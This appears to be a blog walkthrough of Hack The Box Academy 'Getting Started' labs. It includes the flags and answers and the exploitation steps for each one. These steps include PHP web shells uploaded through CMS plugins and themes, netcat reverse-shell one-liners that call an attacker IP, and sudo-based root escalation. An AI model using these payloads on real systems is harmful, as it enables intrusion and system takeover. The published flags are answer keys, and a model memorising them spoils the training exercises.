Basic Tools
Apply what you learned in this section to grab the banner of the above server and submit it as the answer.
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
Service Scanning
Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?
Apache Tomcat
Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.
2323
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called ‘flag’ and submit the contents of the flag.txt file.
dceece590f3284c3866305eb2473d099
The user guest don’t have permission to list the directory. Let’s try the user bob and the password Welcome1
Now we need to enter in the flag directory and list it’s content and download the file flag.txt
Now it’s easy, you need just exit the service and show the content of the file.
Web Enumeration
Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.
gobuster dir -u http://83.136.255.10:34364 -w /usr/share/dirb/wordlists/common.txt
Then I open the link founded by gobuster
But when I click in Continue, nothing happens. So I started to search for other files.
When I looked the source code of the page, I found the login and the password. admin:password123
HTB{w3b_3num3r4710n_r3v34l5_53cr375}
Public Exploits
First, we need to execute nmap to discover the open doors and what is running in wich.
We discovered that, there’s a http service running in port 33997. So, let’s open it in the browser.
Know, we now that it’s running WordPress version 2.7.10. We gonna search if there is a exploit for it.
Now that we know some exploits that we can use, let’s open metasploit.
HTB{my_f1r57_h4ck}
Privilege Escalation
SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.
First we need to connect to the target
Now, we want to see what command we can execute been a super user. Now we know that we can execute a bash without password. So, we can execute the bash as user2.
Now that’s easy. We just need to read the file.
HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’.
Listening the contend of the directory /root, we saw a hidden directory (.ssh). Exploring this directory, we find a ssh key.
Now it’s easy, we just need to copy it’s content to our machine.
And use it to log in the server as a root, without password. Now we have permission to read the file.
HTB{pr1v1l363_35c4l4710n_2_r007}
Nibbles – Enumeration
Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)
2.4.18
Nibbles – Initial Foothold
Gain a foothold on the target and submit the user.txt flag
Let’s scan the server with nmap.
Now that we see that is using 80 port. Let’s access using the brower.
But we didn’t find anything useful. So, let’s scan using gobuster to find some hidden directories or pages.
We found some address, now let’s look at them.
Nothing interesting here too. Sow we want to continuous searching for directories and files.
Now we have the admin page, the user, but we still with no password. Let’s try the name nibbles as a password. And… we are inside.. 😀
Now we want to use the plugin My Image, to inject a command. So click in the tab Plugins
Create a local file and copy the code bellow.
<?php system('id'); ?>Click in the option Configure and choose the file that you create. You see that a lot of erros were showed, but the file was sent.
When we executed Gobuster, we found a directory called content.
Our script works :D.
Now we can change the script to get a reverse shell
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 9443 >/tmp/f"); ?>Send the file again and use Netcat to listen this port.
nc -lvnp 9443Execute the file in the browser again and go to you terminal. Go to the directory /home/nibbler/ and there you gonna find the file with the flag.
79c03865431abf47b90ef24b9695e148
Nibbles – Privilege Escalation
Escalate privileges and submit the root.txt flag.
Now that we still inside the machine, we need to get a better terminal. Type the command above and press enter, enter em the directory /home/nibbler and unzip the file.
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /home/nibbler
unzip personal.zip
Now we have a script, but let’s execute a scan in the system first. For this, we are going to use LinEnum.sh. Download the script and start a server in your machine.
python3 -m http.server 8080And download the file in the machine
wget http://10.10.14.160:8080/LinEnum.sh
And give permission to execution to the file.
chmod +x LinEnum.sh
./LinEnum.shThe nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges without password.
Replace the code inside monitor.sh to the one above:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 8443 >/tmp/f' | tee -a monitor.shExecute Netcat in the other tab
nc -lvnp 8443And execute the script with sudo
sudo ./monitor.shGo to the other tab and look!!! You are logged as a root. To finish the lab, just see the content of the file.
cat /root/root.txt
de5e5d6619862a8aa5b9b212314e0cdd
Knowledge Check
Spawn the target, gain a foothold and submit the contents of the user.txt flag.
First, we need to scan the target
Looking to the file robots.txt, we found a new directory
We already know that the system that is running in 80 port is GetSimple, let’s search for some vulnerabilities
But we don’t know what version is running.
Let’s go back to the address http://10.129.42.249 and look for something interesting.
Back on the homepage, notice towards the top of the page the mention of GetSimple CMS Documentation. Let’s visit this page and see if we can find clues towards our next step.
Starting at the GetSimple Basics page, we can get an idea of how the tool works. Since we need to try and get user data to log into the admin portal, let’s visit data as the wiki notes…
/data – here, the user-generated data is stored.
Looking the files in this directory, we found the admin password
http://10.129.42.249/data/users/admin.xml
But, we need to crack this hash
Great!!! We are inside the system 😀
Clicking in support, we discovered that the system version is 3.3.15
We can’t send any files yet, so let’s look at the Theme tab. And we found a way to edit the themes.
Put the code above inside the theme and save it.
<?php system('id'); ?>Go back to the initial page.
And… it worked!!! 😀
Now it’s time to get a reverse shell
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 4444 >/tmp/f"); ?>Start Netcat on your terminal, save the reverse shell and open the page.
If you want to improve your terminal, insert the code above
python3 -c 'import pty; pty.spawn("/bin/bash")'Searching in the system, we found the flag in /home/mr3b/user.txt.
7002d65b149b0a4d19132a66feed21d8
After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.
First, let’s run the LinEnum.sh script mentioned in the Privilege Escalation section of this module and get this file into our new target.
Note that if you need to get this file again, simple visit https://github.com/rebootuser/LinEnum.git to copy the script onto your local machine.
Create a server in the directory that you downloaded the file
python -m http.server 8080Download the file in the server
wget http://10.10.14.160:8080/LinEnum.sh
Giver permission to execute the file e execute it.
Note that there’s a command that you don’t need to use password to use as a root
Now it’s easy. Below is the command to start a new connection as root.
CMD="/bin/sh"
sudo /usr/bin/php -r "system('$CMD');"Go to the root directory and get the flag.
f1fba6e9f71efb2630e6e34da6387842